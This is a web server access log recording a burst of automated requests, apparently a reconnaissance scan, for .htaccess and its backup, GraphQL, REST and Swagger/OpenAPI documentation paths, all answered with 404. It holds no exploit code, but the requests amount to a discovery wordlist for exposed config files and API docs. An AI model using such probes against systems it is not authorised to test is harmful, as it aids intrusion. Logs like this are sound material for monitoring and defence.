34.19.116.52 - - [01/Aug/2026:01:52:06 +0000] "GET /.htaccess HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:06 +0000] "GET /api/v3 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:06 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:06 +0000] "GET /api/v2/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:06 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:06 +0000] "GET /.htaccess HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:07 +0000] "GET /.htaccess.bak HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:07 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:07 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:07 +0000] "GET /api/v3/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:07 +0000] "GET /api/v3 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:08 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:08 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:08 +0000] "GET /api/v3/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:08 +0000] "GET /docs HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:08 +0000] "GET /docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:08 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:08 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:09 +0000] "GET /docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:09 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:09 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:10 +0000] "GET /graphql HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:10 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:10 +0000] "GET /graphql/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:10 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:11 +0000] "GET /graphql/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:11 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:11 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:11 +0000] "GET /api-docs HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:12 +0000] "GET /api-docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:12 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:12 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:12 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:12 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:12 +0000] "GET /api-docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:13 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:14 +0000] "GET /api/swagger HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:15 +0000] "GET /api/swagger-ui.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:16 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:16 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:16 +0000] "GET /api/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:16 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:16 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:16 +0000] "GET /api/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:17 +0000] "GET /api/swagger.yml HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:17 +0000] "GET /api/swagger.yml/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:17 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:17 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:18 +0000] "GET /api/swagger.yml/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:18 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:18 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:18 +0000] "GET /api/v2/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:19 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:19 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:19 +0000] "GET /api/v2/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:19 +0000] "GET /api/v2/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:19 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:19 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:19 +0000] "GET /apidocs HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:20 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:20 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:20 +0000] "GET /apidocs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:21 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:22 +0000] "GET /rest HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:22 +0000] "GET /apidocs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:22 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:22 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:23 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:23 +0000] "GET /rest/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:23 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:23 +0000] "GET /swagger HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:24 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:24 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:24 +0000] "GET /rest/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:24 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:24 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:24 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:25 +0000] "GET /swagger/ HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:26 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:26 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:26 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:26 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:26 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:26 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger-resources HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger-resources/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:27 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:28 +0000] "GET /swagger-ui HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
